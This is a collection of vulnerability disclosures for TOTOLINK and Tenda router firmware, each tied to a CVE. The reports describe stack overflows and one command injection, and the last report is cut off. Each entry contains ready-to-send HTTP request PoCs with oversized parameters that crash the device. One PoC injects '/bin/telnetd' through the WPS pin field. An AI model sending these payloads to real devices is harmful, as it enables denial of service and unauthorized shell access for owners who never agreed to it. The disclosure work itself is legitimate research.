Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function formAddDnsForward. This vulnerability allows attackers to cause a Denial of Service (DoS) via the DnsForwardRule parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formAddDnsForward` function, `DnsForwardRule` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `DnsForwardRule` to crash the server.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_5/images/1.png)

As you can see here, the input has not been checked. In `DnsForwardRule` function, the parameter `rules` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_5/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `DnsForwardRule` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....** , and the router will crash, such as:

POST /goform/addDNSForward HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 3015
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/network/DNSForward.html?0.6039736643785214
Cookie: \_:USERNAME:\_=; G3v3\_user=

DnsForwardRule=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_5/images/3.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45988: my_vuln/5.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function guestWifiRuleRefresh. This vulnerability allows attackers to cause a Denial of Service (DoS) via the qosGuestUpstream and qosGuestDownstream parameters.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `guestWifiRuleRefresh` function, `qosGuestUpstream、qosGuestDownstream` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `qosGuestUpstream、qosGuestDownstream` to crash the server.

There is a judgment logic in the function `refreshMibItem`, and one of the two inputs needs to be limited to a value of 0 to enter the vulnerability trigger point.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_4/images/1.png)

The function call chain:`formQOSSet`\->`guestWifiRuleRefresh`

In `formQOSSet` function, Only when the value of flag is 1, the `guestWifiRuleRefresh` function will be called.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_4/images/2.png)

In `setQosPolicy` function, Only when the value of `qosPolicy` is the string "user", will the flag value be 1.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_4/images/3.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `qosGuestDownstream` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....** , and the router will crash, such as:

POST /goform/setQos HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 653
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/qos/qosManage.html?0.5334447093236073
Cookie: \_:USERNAME:\_=; G3v3\_user=

qosGuestUpstream=0&qosGuestDownstream=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&qosPolicy=user

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45989: my_vuln/4.md at main · pjqwudi/my_vuln

Totolink devices A3100R v4.1.2cu.5050_B20200504, A830R v5.9c.4729_B20191112, and A720R v4.1.5cu.470_B20200911 were discovered to contain a stack overflow in the function setNoticeCfg. This vulnerability allows attackers to cause a Denial of Service (DoS) via the IpTo parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A3100R、A830R、A720R

Version:A3100R\_Firmware(V4.1.2cu.5050\_B20200504)、A830R\_Firmware(V5.9c.4729\_B20191112)、A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to crash the server.

**Stack overflow**

In `setNoticeCfg` function,`IpTo` is directly passed by the attacker, If this part of the data is too long, it will cause the stack call,so we can control the `IpTo` to crash the server.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_2/images/1.png)

**Supplement**

Initially, I discovered this vulnerability on A720R, which is located in `cstecgi.cgi`. Interestingly, during the process of observing other devices, I found that this function was encapsulated in `system.so`, such as A3100R; finally, I completed the verification on the A3100R device.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_2/images/2.png)

**PoC**

We set `IpTo` as aaaaaaaaaaaaa... , and the web server will crash,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1445
Origin: http://192.168.0.1
Connection: close

{"topicurl":"setting/setNoticeCfg","NoticeEnabled":"1","NoticeUrl":"www.baidu.com","BtnName":"abc123","WhiteListUrl1":"www.baidu.com","WhiteListUrl2":"","WhiteListUrl3":"","IpFrom":"3","IpTo":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","NoticeTimeoutVal":"120"}

It took a while before replying to the error message

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_2/images/3.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-44246: my_vuln/2.md at main · pjqwudi/my_vuln

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a stack overflow in the function setL2tpServerCfg. This vulnerability allows attackers to cause a Denial of Service (DoS) via the eip, sip, server parameters.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:X5000R

Version:X5000R\_Firmware(V9.1.0u.6118\_B20201102)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recentl, allows remote attackers to crash the server.

**Stack Overflow**

In `cstecgi.cgi` binary:

In `setL2tpServerCfg` function, `eip、sip、server` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `eip、sip、server` to crash the server.

As you can see here, the input has not been checked.And then,call the function nvram\_set to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_9/images/1.png)

In `rc` binary:

Eventually, the initial input will be extracted and cause the stack overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_9/images/2.png)

**Supplement**

This vulnerability not only crashed my router, but also cannot be repaired, it can only be restored through rescue mode.

In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, make sure it is a valid ip address.

**PoC**

We set `eip` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....** , and the router will crash, such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 339
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/l2tp.html?time=1639908493613
Cookie: SESSION\_ID=2:1420070622:2

{"enable":"1","sip":"10.8.0.2","eip":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","server":"10.8.0.4","priDns":"8.8.8.8","secDns":"","mtu":1450,"mru":1450,"ipsecL2tpEnable":"0","ipsecPsk":"","topicurl":"setL2tpServerCfg"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_9/images/3.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45736: my_vuln/9.md at main · pjqwudi/my_vuln

TOTOLINK A720R v4.1.5cu.470_B20200911 was discovered to contain a stack overflow in the Form_Login function. This vulnerability allows attackers to cause a Denial of Service (DoS) via the Host parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A720R

Version:A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `lighttpd` binary:

In `Form_Login` function, `Host` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `Host` to crash the server.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_6/images/1.png)

Through the dynamic debugging of gdb, as you can see here, the parameter(a1+272) points to the content of the Host. It will cause the function return address to be overwritten.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_6/images/2.png)

**Supplement**

**This type of buffer overflow appears in various places in the lighttpd file.(Host: ........)**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, you can limit the length of this field.

**PoC**

We set `Host` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa......** , then sending GET request such as:

GET /formLoginAuth.htm?action=login&flag=1 HTTP/1.1
Host: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSION\_ID=2:1591953155:2
Upgrade-Insecure-Requests: 1

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45737: my_vuln/6.md at main · pjqwudi/my_vuln

TOTOLINK A720R v4.1.5cu.470_B20200911 was discovered to contain a stack overflow in the Form_Login function. This vulnerability allows attackers to cause a Denial of Service (DoS) via the flag parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A720R

Version:A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang,Zuoguang Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn,wangzuoguang16@mails.ucas.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to crash the server.

**Stack Overflow**

In `lighttpd` binary:

In `Form_Login` function, `flag` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `flag` to crash the server.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_5/images/1.png)

**Supplement**

in the program. In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, the length can be limited to only 2 and must be a number.

**PoC**

We set `flag` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa** , then sending GET request such as:

http://192.168.0.1/formLoginAuth.htm?action=login&flag=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

GET /formLoginAuth.htm?action=login&flag=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSION\_ID=2:1591953155:2
Upgrade-Insecure-Requests: 1

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45739: my_vuln/5.md at main · pjqwudi/my_vuln

TOTOLINK A720R v4.1.5cu.470_B20200911 was discovered to contain a stack overflow in the setWiFiWpsStart function. This vulnerability allows attackers to cause a Denial of Service (DoS) via the pin parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A720R

Version:A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Stack Overflow & Remote Command Execution

Author:Jiaqian Peng,Huizhao Wang,Zuoguang Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn,wangzuoguang16@mails.ucas.ac.cn

**Vulnerability description**

We found an vulnerability in TOTOLINK Technology router with firmware which was released recently.In `setWiFiWpsStart` function, `pin` is directly passed by the attacker, so we can control the `pin` to attack the OS or cause the stack overflow.

**Remote Command Execution**

In `cstecgi.cgi` binary:

In `setWiFiWpsStart` function, `pin` is directly passed by the attacker.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/1.png)

As you can see here, there is a **judgment logic** here. If the value of the input character is less than 0x3A, it will be copied to the array(v16). **We can construct the input to fill the /x00 between the two arrays**(v16 and v17), which will cause the sprintf function to copy the contents of the two arrays to the array(v14). Then, the array(v16) as a parameter of system function causes the remote command execution.

**Stack Overflow**

In `cstecgi.cgi` binary:

In `setWiFiWpsStart` function,`pin` is directly passed by the attacker.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/1.png)

As you can see here,The length of the input array(v17) is only 28 bytes, we can tamper with the content of the `pin` field, such as a very long string.After that, it will cause the function return address to be overwritten.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/2.png)

**Supplement**

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/4.png)

in the program. In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, the length can be limited to only 8 and must be a number.

**PoC**

**Remote Command Execution**

We set `pin` as **11111111111111111111;/bin/telnetd;** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 119
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/wps.html
Cookie: SESSION\_ID=2:1591951164:2

{"wifiIdx":"0","wscMode":"1","pin":"11111111111111111111;/bin/telnetd;","wscDisabled":"0","topicurl":"setWiFiWpsStart"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/5.png)

**Stack Overflow**

We set `pin` as **AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB** , it cause the stack overflow:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 141
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/wps.html
Cookie: SESSION\_ID=2:1591952948:2

{"wifiIdx":"0","wscMode":"1","pin":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB","wscDisabled":"0","topicurl":"setWiFiWpsStart"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/6.png)

**Result**

**Remote Command Execution**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/7.png)

**Stack Overflow**

The function return address to be overwritten(ra),This may allows attackers to achieve remote code execution.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/8.png)

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/9.png)

CVE-2021-45740: my_vuln/4.md at main · pjqwudi/my_vuln

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a stack overflow in the function setIpv6Cfg. This vulnerability allows attackers to cause a Denial of Service (DoS) via the relay6to4 parameters.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:X5000R

Version:X5000R\_Firmware(V9.1.0u.6118\_B20201102)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `cstecgi.cgi` binary:

In `setIpv6Cfg` function, `relay6to4` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `relay6to4` to crash the server.

The input has not been checked.And then,call the function nvram\_set to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/1.png)

